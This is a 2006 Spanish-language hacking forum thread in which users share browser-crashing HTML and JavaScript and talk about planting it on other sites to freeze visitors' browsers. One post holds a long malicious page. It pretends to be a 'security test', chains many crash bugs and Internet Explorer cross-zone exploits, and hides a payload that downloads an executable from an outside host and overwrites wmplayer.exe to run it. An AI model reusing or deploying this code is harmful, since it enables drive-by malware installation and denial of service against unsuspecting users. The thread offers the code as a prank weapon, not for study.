HackPR.NET

Hacking y Seguridad => HacK General / Ethical Hacking => Topic started by: TheJez on November 02, 2006, 12:32:32 AM

Title: Primer Vulnerabilidad FireFOX 2.0
Post by: TheJez on November 02, 2006, 12:32:32 AM
Se kejaban de que internet explorer 7 ya tenia una vulnerabilidad desde el primer dia de lanzamiento, pues no es tan grave como esta de firefox que es de DOS.... para que les cierren el firefox a los lamers xD

Quote
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <script type="text/javascript">
   function do_crash()
   {
    var range;
    range = document.createRange();
    range.selectNode(document.firstChild);
    range.createContextualFragment('<span></span>');
   }
  </script>
</head>
<body onload="do_crash()">
  <p>Adios Firefox xD!</p>
</body>
</html>
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: porq69 on November 02, 2006, 12:59:35 AM
Quien creo ese script??? Yo nego uno q si usas IE se te freeza la PC y tienes q darle restart
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: _xXx_ on November 02, 2006, 01:52:42 AM
psss ponlo  ;D

me gustaria trabar algunas pc's  ;D



saludos
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: SnO.opy on November 02, 2006, 01:11:51 PM
Si ponlo pero por ejemplo ese q posteo TheJez q  haces con el?? como lo utilisas?
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: porq69 on November 02, 2006, 05:13:45 PM
Quote from: · M¥$têR¥øU§³ ƒ34R ·º¹ on November 02, 2006, 01:11:51 PM
Si ponlo pero por ejemplo ese q posteo TheJez q  haces con el?? como lo utilisas?

Bueno este script lo creo el Clan de Izhal y fue un caos en sus tiempos xD
como funciona??? Sencillo solo subelo algun servidor con extencion htm o html o shtml

<html>

<head>

<link rel="fontdef" src="crash47.pfr">



<style type="text/css">

#crash {position: absolute;}

</style>

<script language="javascript">



while (true) {

  try {



   pattern = new RegExp("(a?)b(\\1{2})+c","g");

   text = "bc";

   match = pattern.test(text);



  } catch(exception) {



  }

}



</script>

<title>Pantalla Azul</title>

</head>



<p>&nbsp;</p>

<p><center><h1>Testeando tu sistema..</h1></center></p>

<blockquote><p>&nbsp;</p>

Este test utiliza unos cuantos bugs para ver si tu navegador y tu sistema operativo estan actualizados y son seguros.

Si te sale una pantalla azul o te da algun error, deberías actualizar el navegador lo antes posible.

<br><br>



Intentando con/con crash (various Windows)...

<img SRC="file://c:/con/con">

Superado<br><br>



Ejecutando invalid JPEG Crash (NS 4.5+)...

<img src="http://24.163.47.118/lolpics/crash-netscape.jpg">

Superado<br><br>



Probando bewm! Crash (NS 4.7)...

<font face="arial black, arial,san serif" size=5>bewm!@#$</font>

Superado<br><br>



Intentando bewm!2 Crash (NS 4.5)...

<div id="crash">

<table width=23% height=23%><tr><td>

  bewm!@#$</b>

</td></tr></table>

</div>Superado<br><br>

<SPAN  STYLE="position:absolute; LEFT:0">

<TABLE BORDER="0" WIDTH=100%><TR><TD><TABLE><TR><TD></TD></TR><TR><TD>

<TABLE><TR><TD></TD></TR></TABLE></TD></TR></TABLE></TD></TR></TABLE></SPAN>Superado<br><br>





Intento de crash IE 5.x-6 (aportado por shap)

<IMG src="::" onError="this.src='::';">



Trying Internal Parser Crash (NS 4.04+)...

Superado

<br><br>



Probando JS Crash (IE 5.5, etc)...

<iframe id=emarf></iframe>

<script>

tcejbo = {};

emarf.document.open();

emarf.document.write("<s"+"cript>top.tcejbo.emarf=0</s"+"cript>");

delete tcejbo;

tcejbo = {};

</script>

Superado<br><br>



Intentando ejecutar NetBunny's Big Form Crash (IE5)...

<table>

<tr>

<td width="1%"><FORM method="POST">

<input type="text" name="crash" size="999999999999999999999999999999..." maxlength="9999999999999999999999999..." value="crash"></td>

</tr>

</table>

Superado<br><br>


Probando IMG Width Crash (some IE)...

<img width=0000000000...000000001>

Superado<br><br>





Probando ClassID Crash (IE)...

<OBJECT CLASSID=file://0000004000..00000400000000000></OBJECT>

Superado<br><br>





<p>Intentando EMBED SRC Crash (IE 4.0)...

<EMBED SRC="http://C|/A.0000000000000...0000000000">

Superado<br><br>

Ejecutando Object Data Loop Crash (various o/s)...

<object data="guerra.shtml"></object>

Superado<br><br>





Intentando flash crash (IE 5+)...

<SCRIPT>

var color = new Array;

color[1] = "white";

color[2] = "white";

for(x = 0; x <3; x++)

{

        document.bgColor = color[x]

        if(x == 2)

        {

                x = 0;

        }

}

</SCRIPT>

Superado<br><br>

Intentando ejecutar Self Referenced Frames Crash

<FRAMESET ROWS = 50%,50%>

<FRAME SRC = "guerra.shtml">

<FRAME SRC = "guerra.shtml">

</FRAMESET>

Superado<br><br>


Varios bugs más..

<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">

<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">

<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">

<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">

<p><font size="2">BackMyParent2 BUG</font></p>

<SCRIPT>

FramedPage="http://www.izhal.com/code.php";

window.open("javascript:alert('JPU\\n HTMLCode = \\n'+document.all.tags('HTML')[0].outerHTML)","_search");

alert("cargando JPU..");

w=window.open(FramedPage,"_search");

alert("cargando frame..");

w.frames[0].open("guerra.shtml","_self");

</SCRIPT>

<SCRIPT>

for(i=1;i<=5;i++)

setTimeout("history.back()");

</SCRIPT>

<p><font size="2">NAFjpuInHistory Bug</font></p>

<SCRIPT>

w=window.open("javascript:'JPU :: document.domain = '+document.domain");

alert("cargando JPU..")

w.window.external.NavigateAndFind("http://www.izhal.com/code.php",'e','_top');

alert("cargando frame..");

w.frames[0].location.href="guerra.shtml";;

</SCRIPT>

<p><font size="2">WsFakeSrc Bug</font></p>

<IFRAME ID=myiframe SRC="HTTP://WWW.IZHAL.COM/CODE.PHP"></IFRAME>

<SCRIPT>

w=window.open("http://www.izhal.com/code.php","_search");

alert("cargando izhal.com en iframe");

myiframe.open("javascript:alert(document.body.innerText)","_search");

</SCRIPT>

<p><font size="2">LinkillerSaveRef Bug</font></p>

<SCRIPT>

w=window.open("about:blank","mywin","location=yes resizable=yes width=200 height=100 top=0 left=0");
Ref=w.location.assign;
w.open("C:\\CON\CON\TEXT.TXT","_self");

function HookFn(In)

   {
      Ref("javascript:alert(document.body.innerText)");
   }

document.execCommand("SelectAll");

document.execCommand("CreateLink",false,"http://xxxx");

document.execCommand("UnSelect");

document.body.createTextRange=HookFn;

document.execCommand("CreateLink");

</SCRIPT>

</p>

<p><font size="2">WsBASEjpu Bug</font></p>

<p><A HREF="http://www.izhal.com/code.php" TARGET="_search" ID=vt_LINK>VT!</A><BR>

  <A HREF=";" TARGET="_search" ID=jpu_LINK>JPU!</A>

  <SCRIPT>

vt_LINK.click();

jpu_LINK.click();

</SCRIPT>

</p>

<p><font size="2">WsOpenFileJPU Bug</font></p>

<SCRIPT>

VtUrl="http://www.izhal.com/code.php";

window.open(VtUrl,"_search");

window.open("file:javascript:alert('document.cookie = '+document.cookie)","_search");

</SCRIPT>
<textarea id="code" style="display:none;">
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
</textarea>

Wait a couple of seconds..

<script language="javascript">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {
            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");
            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }
    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media");
    }
    window.open("error.jsp","_media");
    setTimeout("doit()", 5000);
</script>
<P>
<img src="http://127.0.0.1/.AAAAA...">
<P>
Tu sistema parece seguro, felicidades.
</body>
</html>
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: porq69 on November 02, 2006, 05:17:06 PM
Ahh se me olvido decirles q puede q el Anti-virus lo detecte como virus o malware...
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: TheJez on November 02, 2006, 10:27:17 PM
El que postee, frezea el firefox 2 asi como el de internet explorer que puso porq69  ;D
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: SnO.opy on November 03, 2006, 04:05:04 AM
Osea q?.. lo posteo en una paguina q tenga html .. y el q lo vea se freezea el fire fox y demas=.. serviria en una paguina ASpweblinks?... esas aceptan codigo htmal.. como la de www.webironmaden.com esa tiene aspweblinks..(jeje) de hay lo podre meter y pum freezed?
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: kazin on November 03, 2006, 10:03:47 PM
Si lo podes poner... no es mas que un simple contenido de HTML... lo subis y listo!
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: ElecBoy on November 04, 2006, 04:45:56 PM
Esto no es una vulnerabilidad critica ya que es un script que cierra el firefox esto no tiene que ver nada con inyección de código "buffer overflow" o algun tipo de ataque XSS. Para mi no es una vulnerabilidad aunque si debe ser corregida en la próxima versión.
Title: Re: Primer Vulnerabilidad FireFOX 2.0
Post by: porq69 on November 04, 2006, 07:05:12 PM
Bueno yo tambien pienso q no es un bug pero bueno... Les queria comentar q yo utilizo un Add-on bastante interesante q me proteje de todo tipo de Script haci q es una forma de protejerse de este tipo de bromas o ataques (como le quieran decir)...

Add-on: NoScripts (http://www.noscript.net/whats)

Aqui les dejo un link para q lo prueben "Eliminado"